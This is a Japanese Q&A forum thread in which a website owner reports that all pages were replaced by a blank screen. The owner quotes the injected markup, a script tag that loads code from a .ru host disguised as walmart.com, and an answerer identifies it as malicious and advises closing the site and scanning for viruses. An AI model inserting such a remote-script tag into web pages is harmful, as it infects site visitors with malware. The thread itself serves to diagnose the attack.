人力検索はてな
モバイル版を表示しています。PC版はこちら
i-mobile

公開していたWEBサイトの全ページがいきなり
「orkut-co-in.walmart.com.r」のみ表示される真っ白な画面になってしまいまいた。
ソースコードを開くと
<div id=megaid>orkut-co-in.walmart.com.r</div><script src=http://orkut-co-in.walmart.com.realitykings-com.counterbest.ru:8080/pixnet.net/pixnet.net/google.com/tinyurl.com/auto.ru/></script>
と記述されていました。
これはウイルスか何かでしょうか?orkutを調べたらGoogleの運営するSNSであることが分かりましたが、何か関係があるのでしょうか?
サーバー会社に聞いても「分からない」の一点張りで問題解決できないので何か知っている情報がありましたら教えてください。

●質問者: soyuz11
●カテゴリ:インターネット ウェブ制作
✍キーワード:Google orkut SNS Walmart webサイト
○ 状態 :終了
└ 回答数 : 1/1件

▽最新の回答へ

1 ● horonict
●60ポイント ベストアンサー

コンピュータ・ウイルスの可能性が高いですね。

他に感染者を増やす危険性が高いので、至急ホームページを閉鎖してください。

また、はてな事務局に頼んでこの質問自体を取り消してください(ハイパーリンクしているので感染する恐れがあります)。

感染経路が分からないので、ホームページを更新しているパソコンのウイルスチェックも行ってください。


問題なのは、"orkut" ではなく、"counterbest.ru" というドメイン経由で別のサイトからスクリプトを実行させようとしていることです。

"walmart.com" に偽装しようとしているあたり、悪意をもったスクリプトであることは確かです。

◎質問者からの返答

ありがとうございました。至急質問を閉鎖いたします。

関連質問


●質問をもっと探す●



0.人力検索はてなトップ
8.このページを友達に紹介
9.このページの先頭へ
対応機種一覧
お問い合わせ
ヘルプ/お知らせ
ログイン
無料ユーザー登録
はてなトップ